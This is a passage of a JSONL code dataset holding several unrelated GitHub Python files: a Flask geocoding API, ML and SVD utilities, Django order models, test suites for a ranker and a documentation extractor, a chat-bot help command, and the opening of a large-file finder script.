c_uint16(channel), byref(flowrate), byref(timestamp)))\n return (c_error.value, flowrate.value, timestamp.value)\n\ndef mfcs_cur_liquidflowrate(handle, channel):\n flowrate = c_float(0)\n timestamp = c_uint16(0)\n c_error = c_uint8(lib.mfcs_getCurFlowrate_Liquid(handle, c_uint16(channel), byref(flowrate), byref(timestamp)))\n return (c_error.value, flowrate.value, timestamp.value)\n\ndef mfcs_cur_liquidflowtotalizer(handle, channel):\n flowtotalizer = c_float(0)\n timestamp = c_uint16(0)\n c_error = c_uint8(lib.mfcs_getCurFlowtotalizer(handle, c_uint16(channel), byref(flowtotalizer), byref(timestamp)))\n return (c_error.value, flowtotalizer.value, timestamp.value)\n# endregion\n\n\n","repo_name":"ccmeyer/printing-platform","sub_path":"Scripts/Precigenome/PGMFC/control_c.py","file_name":"control_c.py","file_ext":"py","file_size_in_byte":8468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20646715005","text":"from flask import Flask, jsonify, request\nimport flask_restful\nfrom flask_cors import CORS\nimport urllib.parse\nimport urllib.request\nimport jsons\nimport os\n\napp = Flask(__name__)\nCORS(app) \napi = flask_restful.Api(app)\n\nclass test(flask_restful.Resource):\n def get(self):\n return {\"test\": \"location of test\"}\n\nclass init(flask_restful.Resource):\n def get(self):\n return {\"init\": \"location of address \"}\n\nclass location(flask_restful.Resource):\n def get(self):\n\n args = request.args\n address = request.args.get('address', default=\"Washington DC\", type = str)\n \n\n\n returnurl = 'https://nominatim.openstreetmap.org/search/' + urllib.parse.quote(address) +'?format=json'\n print(returnurl)\n response = urllib.request.urlopen(returnurl)\n data = jsons.loads(response.read().decode(response.info().get_param('charset') ))\n wresponse = \"Lattitude = \" + data[0][\"lat\"]\n wresponse += \"\\nlongitude = \" + data[0][\"lon\"]\n\n return {address: wresponse}\n\n def post(self):\n json_data = request.get_json(force=True)\n firstname = json_data['firstname']\n lastname = json_data['lastname']\n return jsonify(firstname=firstname, lastname=lastname)\n\napi.add_resource(init, '/init')\napi.add_resource(test, '/test')\napi.add_resource(location, '/location')\n\nif __name__ == '__main__':\n port = os.environ.get('FLASK_PORT') or 8080\n port = int(port)\n\n app.run(port=port,host='0.0.0.0')\n\n","repo_name":"jayant51/location-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14248878314","text":"#algoritms Алгоритмы\nnumbers=[2,4,6,7,11,44,12,56,23,25,67]\nres=4 in numbers\nprint(res)\n\nfor i in numbers:\n if i==2:\n print('$$$',[])\n break\n#hacker rank","repo_name":"FireFox5/FireMonkey-","sub_path":"second Month/seventh lesson 02.09.2021/7.1.py","file_name":"7.1.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27202158985","text":"\"\"\"General utility functions\"\"\"\nimport os\n# import cv2\nimport json\nimport shutil\nimport logging\nimport tensorflow as tf\nfrom util.label_map_util import get_label_map_dict\n\n\nclass Params():\n \"\"\"Class that loads hyperparameters from a json file.\n\n Example:\n ```\n params = Params(json_path)\n print(params.learning_rate)\n params.learning_rate = 0.5 # change the value of learning_rate in params\n ```\n \"\"\"\n\n def __init__(self, json_path):\n self.update(json_path)\n\n def save(self, json_path):\n \"\"\"Saves parameters to json file\"\"\"\n with open(json_path, 'w') as f:\n json.dump(self.__dict__, f, indent=4)\n\n def update(self, json_path):\n \"\"\"Loads parameters from json file\"\"\"\n with open(json_path) as f:\n params = json.load(f)\n self.__dict__.update(params)\n\n @property\n def dict(self):\n \"\"\"Gives dict-like access to Params instance by `params.dict['learning_rate']`\"\"\"\n return self.__dict__\n\n\ndef set_logger(log_path):\n \"\"\"Sets the logger to log info in terminal and file `log_path`.\n\n In general, it is useful to have a logger so that every output to the terminal is saved\n in a permanent file. Here we save it to `model_dir/train.log`.\n\n Example:\n ```\n logging.info(\"Starting training...\")\n ```\n\n Args:\n log_path: (string) where to log\n \"\"\"\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n if not logger.handlers:\n # Logging to a file\n file_handler = logging.FileHandler(log_path)\n file_handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s: %(message)s'))\n logger.addHandler(file_handler)\n\n # Logging to console\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(logging.Formatter('%(message)s'))\n logger.addHandler(stream_handler)\n\n\ndef save_dict_to_json(d, json_path):\n \"\"\"Saves dict of floats in json file\n\n Args:\n d: (dict) of float-castable values (np.float, int, float, etc.)\n json_path: (string) path to json file\n \"\"\"\n with open(json_path, 'w') as f:\n # We need to convert the values to float for json (it doesn't accept np.array, np.float, )\n d = {k: float(v) for k, v in d.items()}\n json.dump(d, f, indent=4)\n\n\ndef get_ab_path(root_path):\n # 得到当前文件夹内的所有子文件\n image_paths = []\n # c_folder当前文件夹完全路径,subfolder当前文件夹的子文件夹,files当前文件夹的子文件\n for c_folder, subfolder, files in os.walk(root_path):\n for file in files:\n if file.endswith('.jpg'):\n image = os.path.join(c_folder, file)\n # print(image)\n image_paths.append(image)\n return image_paths\n\n\ndef get_data(data_dir, label_map_path):\n label_map = get_label_map_dict(label_map_path) # lable_map[name:id] id begin with 1\n image_path_list = []\n image_label_list = []\n data_num = 0\n for cur_folder, sub_folders, sub_files in os.walk(data_dir):\n for file in sub_files:\n if file.endswith('jpg'):\n data_num += 1\n image_path_list.append(os.path.join(cur_folder, file))\n image_label_list.append(label_map[os.path.split(cur_folder)[-1]])\n print('image_num:', data_num)\n data_tuple = (image_path_list, image_label_list)\n return data_tuple\n\n\ndef get_train_data(data_dir, label_map_path):\n label_map = get_label_map_dict(label_map_path) # lable_map[name:id] id begin with 1\n image_path_dict = {}\n data_num = 0\n for cur_folder, sub_folders, sub_files in os.walk(data_dir):\n for file in sub_files:\n if file.endswith('jpg'):\n data_num += 1\n label_id = label_map[os.path.split(cur_folder)[-1]]\n image_path_dict.setdefault(label_id, [])\n image_path_dict[label_id].append(os.path.join(cur_folder, file))\n\n print('image_num:', data_num)\n return image_path_dict\n\n\ndef get_dict(root_path):\n # 当前root_path的 子文件夹名 作为key,子文件夹内的 子文件完全路径 作为value\n truth_dict = {}\n for c_folder, subfolder, files in os.walk(root_path):\n image_list = []\n for file in files:\n if file.endswith('.jpg'):\n image = os.path.join(c_folder, file)\n image_list.append(image)\n label = os.path.split(c_folder)[-1]\n truth_dict[label] = image_list\n return truth_dict\n\n\ndef image_size(img_dir):\n import os\n import cv2\n\n small_num = 0\n mid_num = 0\n large_num = 0\n for cur_folder, sub_folders, sub_files in os.walk(img_dir):\n for file in sub_files:\n if file.endswith('jpg'):\n img = cv2.imread(os.path.join(cur_folder, file))\n pixel_areas = img.shape[0] * img.shape[1]\n if pixel_areas < 3600:\n small_num += 1\n elif pixel_areas < 8100:\n mid_num += 1\n else:\n large_num += 1\n\n print('small num:', small_num)\n print('mid_num:', mid_num)\n print('large_num:', large_num)\n\n\ndef get_variable_to_restore(vars_dict, checkpoint_path, include_global_step=False):\n \"\"\"\n\n :param vars_dict:\n :param checkpoint_path:\n :param include_global_step:\n :return:\n \"\"\"\n if isinstance(vars_dict, list):\n vars_map = {v.op.name: v for v in vars_dict}\n elif isinstance(vars_dict, dict):\n vars_map = vars_dict\n else:\n raise ValueError(\"`vars_dict` is excepted to be a list or dict\")\n\n ckpt_reader = tf.train.NewCheckpointReader(checkpoint_path)\n ckpt_vars_to_shape_map = ckpt_reader.get_variable_to_shape_map()\n if not include_global_step:\n ckpt_vars_to_shape_map.pop(tf.GraphKeys.GLOBAL_STEP, None)\n var_in_ckpt={}\n for var_name, var in sorted(vars_map):\n if var_name in ckpt_vars_to_shape_map:\n if var.shape.as_list() == ckpt_vars_to_shape_map[var_name]:\n var_in_ckpt[var_name] = var\n else:\n logging.WARNING('Variable [%s] is available in checkpoint, but has an '\n 'incompatible shape with model variable. Checkpoint '\n 'shape: [%s], model variable shape: [%s]. This '\n 'variable will not be initialized from the checkpoint.',\n var_name, ckpt_vars_to_shape_map[var_name], var.shape.as_list())\n else:\n logging.warning('Variable [%s] is not available in checkpoint', var_name)\n\n if isinstance(vars_dict, list):\n return var_in_ckpt.values()\n return var_in_ckpt\n","repo_name":"yongqis/trilinear_se_net","sub_path":"util/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73220853053","text":"from typing import Union\n\nfrom nonebot import on_command\nfrom nonebot.adapters.onebot.v11 import GroupMessageEvent, PrivateMessageEvent\n\ncqwu_help_t = \"重文理帮助\"\ncqwu_help = on_command(\"cqwu\", aliases={cqwu_help_t}, priority=4, block=False)\ncqwu_help.__help_name__ = cqwu_help_t\ncqwu_help.__help_info__ = cqwu_help_t\n\n\n@cqwu_help.handle()\nasync def handle_first_receive(_: Union[GroupMessageEvent, PrivateMessageEvent]):\n await cqwu_help.finish(\n \"重文理帮助\\n\\n\"\n \"/cqwu_login 登录账号\\n\"\n \"/cqwu_score 查询期末成绩\\n\"\n \"/cqwu_balance 查询校园卡余额\\n\"\n \"/cqwu_calendar 查询本学期课表\\n\"\n \"/cqwu_calendar_change 查询本学期调课\\n\"\n \"/cqwu_exam 查询本学期考试安排\"\n )\n","repo_name":"cqwu-ehall/nonebot_plugin_cqwu_support","sub_path":"help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4343961929","text":"import sys\nimport unittest\nsys.path.append('../')\nfrom mapped_ranker import *\n\n# pylint: disable-msg=C0103,C0111,R0904 \nclass mapped_rankerTests(unittest.TestCase):\n def setUp(self):\n \"\"\"Copied from mapped_link_matrix and pageranker\n (0)-->(1)-->(2)-->(3)<--(4)\n ↑ ╲__ ↗|\n └─────────────────┘\n With this graph, node 3 should have the highest pagerank, followed by\n nodes 0, 1, 2 in that order. 4 should be the lowest.\n \"\"\"\n self.m=MappedLinkMatrix(['term0',\n 'term1',\n 'term2',\n 'term3',\n 'term4']) # Create a 5x5 link_matrix\n\n self.r=MappedRanker(PageRanker(epsilon=1e-10))\n self.m[0, 1]=1\n self.m[1, 2]=1\n self.m[2, 3]=2\n self.m[4, 3]=1\n self.m[3, 0]=1\n self.e=[0.15] * len(self.m)\n def testMappedRankerCreatesRankerResultSets(self):\n ranking=self.r.evaluate(self.m, self.e)\n # print ranking\n self.assert_(type(ranking) is RankerResultSet)\n def testResultsMakeSense(self):\n ranking=self.r.evaluate(self.m, self.e)\n self.assert_(ranking['term3'] > ranking['term4'])\n self.assert_(ranking['term2'] < ranking['term0'])\n def testRankerAttributesAccessible(self):\n raised=False\n try:\n self.r.stats\n except:\n raised=True\n self.assertFalse(raised)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"jherskovic/MEDRank","sub_path":"MEDRank/computation/tests/test_mapped_ranker.py","file_name":"test_mapped_ranker.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"25609009180","text":"from PIL import Image\nimport numpy as np\nfrom numpy.linalg import linalg\nimport q6\nimport q7\n\ndef runQ6():\n image = Image.open(\"fox_2.jpg\")\n R, G, B = q6.getImageMatrixes(image)\n ks = [5, 50, 100, 250, 300, 350, 400, 550]\n\n for k in ks:\n nR = q6.decomposeSVD(k, R)\n nG = q6.decomposeSVD(k, G)\n nB = q6.decomposeSVD(k, B)\n newIm = q6.createNewImage(image, nR, nG, nB, k)\n\n\ndef runQ7():\n s_list = [5, 10, 50, 200, 500, 1024]\n k_list = [1, 5, 10, 15, 50, 200]\n train_d, train_l = q7.train_data()\n test_d, test_l = q7.test_data()\n\n predictions = dict()\n U, e, v = np.linalg.svd(train_d, full_matrices=False)\n\n for s in s_list:\n print(s)\n Us = U[:, :s]\n train_proj = np.matmul(Us.T, train_d)\n test_proj = np.matmul(Us.T, test_d)\n inner_products = np.matmul(train_proj.T, test_proj)\n normsTrain = np.square(np.linalg.norm(train_proj, axis=0))\n\n for i in range(test_proj.shape[1]):\n distances = normsTrain - 2 * inner_products[:, i]\n prediction = q7.find_k_neighbors(distances, train_l, k_list)\n for k in prediction:\n predictions[s, k, i] = prediction[k]\n\n errors = q7.find_errors(predictions, k_list, s_list, test_l)\n print(errors)\n\n\nif __name__ == '__main__':\n runQ7()\n\n\n\n\n\n\n","repo_name":"Mormorfor/algebraicMethodsHW04","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"40431807704","text":"# python setup.py test\n# or\n# python runtests.py\n\nimport sys\nfrom django import VERSION as django_version\nfrom django.conf import settings\n\nAPP = 'djrill'\nADMIN = 'django.contrib.admin'\nif django_version >= (1, 7):\n ADMIN = 'django.contrib.admin.apps.SimpleAdminConfig'\n\nsettings.configure(\n DEBUG=True,\n DATABASES={\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n }\n },\n ROOT_URLCONF=APP+'.urls',\n INSTALLED_APPS=(\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n ADMIN,\n APP,\n ),\n MIDDLEWARE_CLASSES=(\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n ),\n TEMPLATES=[\n # Django 1.8 starter-project template settings\n # (needed for test_admin)\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n # insert your TEMPLATE_DIRS here\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.debug',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n ],\n)\n\ntry:\n # Django 1.7+ initialize app registry\n from django import setup\n setup()\nexcept ImportError:\n pass\n\ntry:\n from django.test.runner import DiscoverRunner as TestRunner # Django 1.6+\nexcept ImportError:\n from django.test.simple import DjangoTestSuiteRunner as TestRunner # Django -1.5\n\n\ndef runtests():\n test_runner = TestRunner(verbosity=1)\n failures = test_runner.run_tests([APP])\n sys.exit(failures)\n\nif __name__ == '__main__':\n runtests()\n","repo_name":"Kalimita/Djrill","sub_path":"runtests.py","file_name":"runtests.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"22195980148","text":"import uuid\nfrom django.db import models\nfrom usuario.models import User\nfrom carrito.models import Carro\nfrom .common import OrdenEstado\nfrom .common import choices\nfrom enum import Enum\nfrom direcciones.models import DirrecionesEnvios\n\nfrom django.db.models.signals import pre_save\nclass Orden(models.Model):\n orden_id = models.CharField(max_length=100, null=False, blank=False, unique=True)\n usuario = models.ForeignKey(User, on_delete=models.CASCADE)\n carrito = models.ForeignKey(Carro, on_delete=models.CASCADE)\n estado = models.CharField(max_length=50, choices=choices, default=OrdenEstado.CREADO)\n \n precio_envio = models.DecimalField(default=5, max_digits=8, decimal_places=2)\n total = models.DecimalField(default=0, max_digits=8, decimal_places=2)\n fecha_crea = models.DateTimeField(auto_now=True)\n direccionorden = models.ForeignKey(DirrecionesEnvios, #Una dirección de envío puede tener muchas ordenes\n null=True, blank=True,\n on_delete=models.CASCADE)\n def __str__(self):\n return self.orden_id\n \n def cancel(self):\n self.status = OrdenEstado.CANCELADA\n self.save()\n \n def complete(self):\n self.estado = OrdenEstado.COMPLETADA\n self.save()\n \n def update_total(self):\n self.total = self.get_total()\n self.save()\n \n def get_total(self):\n return self.carrito.total + self.precio_envio\n \n def update_shipping_direccion(self,direccionorden):\n self.direccionorden = direccionorden\n self.save()\n \n def get_or_set_shipping_address(self):\n if self.direccionorden:\n return self.direccionorden\n\n direccionorden = self.usuario.shipping_address\n\n if direccionorden:\n self.direccionorden = direccionorden\n self.save()\n\n return direccionorden\n \n \ndef set_orden_id(sender, instance, *args, **kwargs):\n if not instance.orden_id:\n instance.orden_id = str(uuid.uuid4())\n\ndef set_total(sender, instance, *args, **kwargs):\n instance.total = instance.get_total()\n\npre_save.connect(set_orden_id, sender=Orden)\npre_save.connect(set_total, sender=Orden)","repo_name":"EdwardAJ6/-Distribuidora-Occidental-Python","sub_path":"orden/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"12031457451","text":"\"\"\"\nTest resource extractor.\n\"\"\"\nfrom pydantic import Field\n\nfrom featurebyte.common.doc_util import FBAutoDoc\nfrom featurebyte.common.documentation.doc_types import (\n ExceptionDetails,\n ParameterDetails,\n ResourceDetails,\n)\nfrom featurebyte.common.documentation.resource_extractor import get_resource_details\nfrom featurebyte.enum import StrEnum\n\n\nclass TestDocumentation:\n \"\"\"\n Class documentation string.\n\n Let's add more lines to this documentation to make this more realistic, and also to make sure\n that it is parsed correctly.\n\n See Also\n --------\n Some text that normally references other resources.\n\n Examples\n --------\n Some example code.\n \"\"\"\n\n pydantic_int_field: int = Field(description=\"pydantic int field description\")\n\n def __init__(self, constructor_param: str):\n self.constructor_param = constructor_param\n\n @property\n def constructor_param_property(self) -> str:\n \"\"\"\n Property documentation string.\n\n Returns\n -------\n str\n Property string\n \"\"\"\n return self.constructor_param\n\n def instance_method(self, arg1: int) -> str:\n \"\"\"\n Method documentation string.\n\n Add more description for extra length, and extra parsing!!\n\n Parameters\n ----------\n arg1: int\n Some description\n\n Returns\n -------\n str\n Some description\n\n Raises\n ------\n Exception\n Some description\n\n Examples\n --------\n Some example code.\n \"\"\"\n if arg1 == 1:\n raise Exception(\"arg is 1\")\n elif self.constructor_param == \"error\":\n raise Exception(\"constructor param is error\")\n return \"test method\"\n\n\nclass TestDocumentationEnum(StrEnum):\n \"\"\"\n Test documentation for enum classes.\n \"\"\"\n\n TEST = \"test\", \"test field 1\"\n TEST2 = \"test2\", \"test field 2\"\n NO_DESCRIPTION = \"no desc\"\n\n\nclass DocClassWithFbAutoDocParams:\n \"\"\"\n Doc class with FBAutoDoc proxy path, and skip params.\n \"\"\"\n\n __fbautodoc__ = FBAutoDoc(\n proxy_class=\"autodoc_proxy\",\n skip_params_and_signature_in_class_docs=True,\n hide_keyword_only_params_in_class_docs=True,\n )\n\n\ndef test_get_resource_details__enum_class():\n \"\"\"\n Test get_resource_details for enum classes.\n \"\"\"\n resource_details = get_resource_details(\n \"tests.unit.common.documentation.test_resource_extractor.TestDocumentationEnum\"\n )\n expected_resource_details = ResourceDetails(\n name=\"TestDocumentationEnum\",\n realname=\"TestDocumentationEnum\",\n path=\"tests.unit.common.documentation.test_resource_extractor\",\n proxy_path=None,\n type=\"class\",\n base_classes=[\"StrEnum\"],\n method_type=None,\n short_description=\"Test documentation for enum classes.\",\n long_description=None,\n parameters=[],\n returns=ParameterDetails(name=None, type=None, default=None, description=None),\n raises=[],\n examples=[],\n see_also=None,\n enum_values=[\n ParameterDetails(\n name=\"TEST\",\n type=\"\",\n default=\"None\",\n description=\"test field 1\",\n ),\n ParameterDetails(\n name=\"TEST2\",\n type=\"\",\n default=\"None\",\n description=\"test field 2\",\n ),\n ParameterDetails(\n name=\"NO DESC\",\n type=\"\",\n default=\"None\",\n description=\"Test documentation for enum classes.\",\n ),\n ],\n should_skip_params_in_class_docs=False,\n should_skip_signature_in_class_docs=False,\n should_hide_keyword_only_params_in_class_docs=False,\n )\n assert resource_details == expected_resource_details\n\n\ndef test_get_resource_details__class():\n \"\"\"\n Test get_resource_details for classes.\n \"\"\"\n resource_details = get_resource_details(\n \"tests.unit.common.documentation.test_resource_extractor.TestDocumentation\"\n )\n expected_resource_details = ResourceDetails(\n name=\"TestDocumentation\",\n realname=\"TestDocumentation\",\n path=\"tests.unit.common.documentation.test_resource_extractor\",\n proxy_path=None,\n type=\"class\",\n base_classes=[\"object\"],\n method_type=None,\n short_description=\"Class documentation string.\",\n long_description=\"Let's add more lines to this documentation to make this more realistic, and also to make \"\n \"sure\\nthat it is parsed correctly.\",\n parameters=[\n ParameterDetails(name=\"constructor_param\", type=\"str\", default=None, description=None)\n ],\n returns=ParameterDetails(name=None, type=None, default=None, description=None),\n raises=[],\n examples=[\"Some example code.\"],\n see_also=\"Some text that normally references other resources.\",\n enum_values=[],\n should_skip_params_in_class_docs=False,\n should_skip_signature_in_class_docs=False,\n should_hide_keyword_only_params_in_class_docs=False,\n )\n assert resource_details == expected_resource_details\n\n\ndef test_get_resource_details__method():\n \"\"\"\n Test get_resource_details for method.\n \"\"\"\n resource_details = get_resource_details(\n \"tests.unit.common.documentation.test_resource_extractor.TestDocumentation::instance_method\"\n )\n expected_resource_details = ResourceDetails(\n name=\"instance_method\",\n realname=\"instance_method\",\n path=\"tests.unit.common.documentation.test_resource_extractor.TestDocumentation\",\n proxy_path=None,\n type=\"method\",\n base_classes=None,\n method_type=None,\n short_description=\"Method documentation string.\",\n long_description=\"Add more description for extra length, and extra parsing!!\",\n parameters=[\n ParameterDetails(name=\"arg1\", type=\"int\", default=None, description=\"Some description\")\n ],\n returns=ParameterDetails(\n name=None, type=\"str\", default=None, description=\"Some description\"\n ),\n raises=[ExceptionDetails(type=\"Exception\", description=\"Some description\")],\n examples=[\"Some example code.\"],\n see_also=None,\n enum_values=[],\n should_skip_params_in_class_docs=False,\n should_skip_signature_in_class_docs=False,\n should_hide_keyword_only_params_in_class_docs=False,\n )\n assert resource_details == expected_resource_details\n\n\ndef test_get_resource_details__pydantic_field():\n \"\"\"\n Test get_resource_details for pydantic fields.\n \"\"\"\n resource_details = get_resource_details(\n \"tests.unit.common.documentation.test_resource_extractor.TestDocumentation::pydantic_int_field\"\n )\n expected_resource_details = ResourceDetails(\n name=\"pydantic_int_field\",\n realname=\"pydantic_int_field\",\n path=\"tests.unit.common.documentation.test_resource_extractor.TestDocumentation\",\n proxy_path=None,\n type=\"property\",\n base_classes=None,\n method_type=None,\n short_description=\"Captures extra information about a field.\", # TODO: this is wrong\n long_description=None,\n parameters=[],\n returns=ParameterDetails(name=None, type=\"FieldInfo\", default=None, description=None),\n raises=[],\n examples=[],\n see_also=None,\n enum_values=[],\n should_skip_params_in_class_docs=False,\n should_skip_signature_in_class_docs=False,\n should_hide_keyword_only_params_in_class_docs=False,\n )\n assert resource_details == expected_resource_details\n\n\ndef test_get_resource_details__property():\n \"\"\"\n Test get_resource_details for properties.\n \"\"\"\n resource_details = get_resource_details(\n \"tests.unit.common.documentation.test_resource_extractor.TestDocumentation::constructor_param_property\"\n )\n expected_resource_details = ResourceDetails(\n name=\"constructor_param_property\",\n realname=\"constructor_param_property\",\n path=\"tests.unit.common.documentation.test_resource_extractor.TestDocumentation\",\n proxy_path=None,\n type=\"property\",\n base_classes=None,\n method_type=None,\n short_description=\"Property documentation string.\",\n long_description=None,\n parameters=[],\n returns=ParameterDetails(\n name=None, type=\"str\", default=None, description=\"Property string\"\n ),\n raises=[],\n examples=[],\n see_also=None,\n enum_values=[],\n should_skip_params_in_class_docs=False,\n should_skip_signature_in_class_docs=False,\n should_hide_keyword_only_params_in_class_docs=False,\n )\n assert resource_details == expected_resource_details\n\n\ndef test_get_resource_details__proxy_paths():\n \"\"\"\n Test proxy paths\n \"\"\"\n # Can specify via # separator\n details = get_resource_details(\n \"tests.unit.common.documentation.test_resource_extractor.TestDocumentation::constructor_param_property#proxy\"\n )\n assert details.proxy_path == \"proxy\"\n\n # Or infer via FBAutoDoc override\n resource_details = get_resource_details(\n \"tests.unit.common.documentation.test_resource_extractor.DocClassWithFbAutoDocParams\"\n )\n assert resource_details.proxy_path == \"autodoc_proxy\"\n assert resource_details.should_skip_params_in_class_docs\n assert resource_details.should_skip_signature_in_class_docs\n assert resource_details.should_hide_keyword_only_params_in_class_docs\n\n\ndef test_resource_details__change_view():\n \"\"\"\n Test extracting resource details on get_change_view.\n\n We test this class specifically because the parameters were not getting their types extracted properly. This was\n due to some unknown issue in type_hints. Due to lack of time, a workaround is used to just rely on the annotation\n of the parameter, instead of trying to infer the type. The downside is that this type is just a string, and\n doesn't have any contextual information.\n \"\"\"\n details = get_resource_details(\"featurebyte.api.scd_table.SCDTable::get_change_view\")\n assert details == ResourceDetails(\n name=\"get_change_view\",\n realname=\"get_change_view\",\n path=\"featurebyte.api.scd_table.SCDTable\",\n proxy_path=\"featurebyte.SCDTable\",\n type=\"method\",\n base_classes=None,\n method_type=None,\n short_description=\"Gets a ChangeView from a Slowly Changing Dimension (SCD) table. The view offers a method to \"\n \"examine alterations\",\n long_description=\"that occur in a specific attribute within the natural key of the SCD table.\\n\\nTo create the \"\n \"ChangeView, you need to provide the name of the SCD column for which you want to track \"\n \"changes\\nthrough the track_changes_column parameter.\\n\\nOptionally,\\n\\n- you can define the \"\n \"default Feature Job Setting for the View. Default is once a day, at the time of the\\n\"\n \"creation of the view.\\n- you can provide a `prefix` parameter to control how the views \"\n \"columns are named.\\n\\nThe resulting view has 5 columns:\\n\\n- the natural key of the \"\n \"SCDView\\n- past_: value of the column before the change\\n- new_\"\n \": value of the column after the change\\n- past_valid_from_timestamp \"\n \"(equal to the effective timestamp of the SCD before the change)\\n- new_valid_from_timestamp \"\n \"(equal to the effective timestamp of the SCD after the change)\\n\\nThe ChangeView can be \"\n \"used to create Aggregates of Changes Over a Window features, similar to Aggregates Over\\na \"\n \"Window features created from an Event View.\",\n parameters=[\n ParameterDetails(\n name=\"track_changes_column\",\n type=\"str\",\n default=None,\n description=\"Name of the column to track changes for.\",\n ),\n ParameterDetails(\n name=\"default_feature_job_setting\",\n type=\"Optional[FeatureJobSetting]\",\n default=\"None\",\n description=\"Default feature job setting to set with the FeatureJobSetting constructor. If not \"\n \"provided, the default\\nfeature job setting is daily, aligning with the view's \"\n \"creation time.\",\n ),\n ParameterDetails(\n name=\"prefixes\",\n type=\"Optional[Tuple[Optional[str], Optional[str]]]\",\n default=\"None\",\n description=\"Optional prefixes where each element indicates the prefix to add to the new column \"\n \"names for the name of\\nthe column that we want to track. The first prefix will be \"\n \"used for the old, and the second for the new.\\nIf not provided, the column names \"\n 'will be prefixed with the default values of \"past_\", and \"new_\". At\\nleast one of '\n \"the values must not be None. If two values are provided, they must be different.\",\n ),\n ParameterDetails(\n name=\"view_mode\",\n type=\"Literal[ViewMode.AUTO, ViewMode.MANUAL]\",\n default='\"auto\"',\n description=\"View mode to use. When auto, the view will be constructed with cleaning operations.\",\n ),\n ParameterDetails(\n name=\"drop_column_names\",\n type=\"Optional[List[str]]\",\n default=\"None\",\n description=\"List of column names to drop (manual mode only).\",\n ),\n ParameterDetails(\n name=\"column_cleaning_operations\",\n type=\"Optional[List[ColumnCleaningOperation]]\",\n default=\"None\",\n description=\"List of cleaning operations to apply per column in manual mode only. Each element \"\n \"in the list indicates the\\ncleaning operations for a specific column. The \"\n \"association between this column and the cleaning operations\\nis established via \"\n \"the ColumnCleaningOperation constructor.\",\n ),\n ],\n returns=ParameterDetails(\n name=None,\n type=\"ChangeView\",\n default=None,\n description=\"ChangeView object constructed from the SCD source table.\",\n ),\n raises=[],\n examples=[\n \"Get a ChangeView to track changes in Customer's State.\\n\",\n '\\n```pycon\\n>>> scd_table = catalog.get_table(\"GROCERYCUSTOMER\")\\n>>> change_view = '\n 'scd_table.get_change_view(\\n... track_changes_column=\"State\",\\n... prefixes=(\"previous_\", '\n '\"next_\"),\\n... )\\n```\\n',\n ],\n see_also=None,\n enum_values=[],\n should_skip_params_in_class_docs=True,\n should_skip_signature_in_class_docs=True,\n should_hide_keyword_only_params_in_class_docs=False,\n )\n","repo_name":"featurebyte/featurebyte","sub_path":"tests/unit/common/documentation/test_resource_extractor.py","file_name":"test_resource_extractor.py","file_ext":"py","file_size_in_byte":15142,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"78"} +{"seq_id":"19499292942","text":"# Imports\nimport os\nimport pathlib as pl\nimport sys\n\n\n# Variables\nallFiles = {}\nintervalCounter = 0\n\n# Configuration constants\nrawMainPath = \"/\"\nmainPath = pl.Path(rawMainPath)\n\nopenTextMarker = \"\\033[93m\"\ncloseTextMarker = \"\\033[0m\"\n\ninteractive = True\nshowPathErrors = True\nshowRmErrors = True\nshowIntervalPrints = True\nreverseOrder = False\nhumanReadableOutput = True\n\norderBySize = True\nif orderBySize == True:\n orderValue = lambda x: x[1]\nelse:\n orderValue = None\n\nlineRange = 10\ninterval = 0\nminFileSize = 1024 * 1024 * 10\nmaxFilesize = 10 ** 15\n\nsizeNames = [\"B\", \"KB\", \"MB\", \"GB\", \"TB\"]\n\ndirsToIgnore = [] # Directories must start with / for example: [\"/AppData\"]\n\ntempDirsToIgnore = []\nfor directory in dirsToIgnore:\n tempDirsToIgnore.append(f\"{mainPath}{pl.Path(directory)}\")\n\ndirsToIgnore = tempDirsToIgnore\n\n\n# Task functions\ndef waitKey():\n key = None\n\n if os.name == 'nt':\n import msvcrt\n key = bytes.decode(msvcrt.getch())\n else:\n import termios\n import tty\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(sys.stdin.fileno())\n key = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n \n return key\n\ndef getItemsInPath(path):\n filesInPath = {}\n 